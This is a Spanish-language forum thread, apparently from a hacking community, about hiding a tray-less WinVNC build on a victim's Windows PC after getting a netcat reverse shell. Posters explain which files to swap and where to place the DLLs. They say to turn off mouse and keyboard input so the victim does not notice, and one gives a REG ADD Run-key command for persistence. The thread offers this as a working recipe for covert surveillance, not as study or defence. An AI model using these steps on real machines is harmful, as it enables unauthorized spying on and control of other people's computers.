pues yo no le veo la opcion de reverse shell al vnc ni con la version 4
lo de la reverse shell, nunca dije que se realizara con el vnc sino con el netcat (fijaos un poco en mi explicacion).Citar
configuro el server con el pass
cierro
me bajo vnc-3_3_2r6_x86_win32_notray.zip
remplazo el WinVNC.exe
, pero ahi viene mi consulta, dentro del zip de vnc-3_3_2r6_x86_win32_notray.zip
tambien vienen :
omnithread_rt.dll
VNCHooks.dll
vncviewer.exe
esos tambien los remplazo
cierro
me bajo vnc-3_3_2r6_x86_win32_notray.zip
remplazo el WinVNC.exe
, pero ahi viene mi consulta, dentro del zip de vnc-3_3_2r6_x86_win32_notray.zip
tambien vienen :
omnithread_rt.dll
VNCHooks.dll
vncviewer.exe
esos tambien los remplazo
basta con que cambies solo el winvnc, como dice Gospel.
aki hay algo que esconden. yo tb lo he probado y me sale lo mismo. la password no se keda almacenada. A parte que cuando lo lanzas por consola se abre la ventana de propiedades
pues mas que nada se debe a que el vncviewer que trae el vnc que nos descargamos no es 100% compatible con el winvnc que nos descargamos para que no nos mostrara el icono :'(.pero como en este foro todo tiee solucion, ya encontre una
solo necesitamos descargarnos este vncviewer:
http://www.realvnc.com/dist/vnc-4.0-x86_win32_viewer.exe
ponemos su ip y listo (recuerden desabilitar las opciones de teclado y mouse para que solo lo observemos y no nos cache en la matada xDDD). es de ley que va a funcionar, lo acabo de comprobar y solo me pidio la contraseña que puse.
un punto que se te escapo Gospel, fue de que si la victima reinicia su pc, ya no reiniciara el winvnc y tendriamos que obtener otra vez la shell remota para iniciarlo.
asi de que lo mejor es agregar un valor al registro de esta manera:
en la shell remota tecleamos lo siguiente:
Código:
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Winvnc /t REG_SZ /d "C:\vnc\winvnc"
seria asi si nosotros le subimos los archivos en la carpeta vnc que se encuentra en el directorio raiz, si no es asi solo basta con que pongamos la ubicacion del winvnc y listo, ya le tendremos una entrada en registro para que se inicie junto con windows y la victima ni cuenta se de xDDD.
solo me queda recordarles que los archivos WinVNC.exe y VNCHooks.dll tienen que estar en la misma carpeta, y el archivo omnithread_rt.dll localizado en C:\WINDOWS\system32, tiene que estar dentro de system32 en la victima.
saludos y espero haberles aclarado las dudas para que empiecen a jugar por alli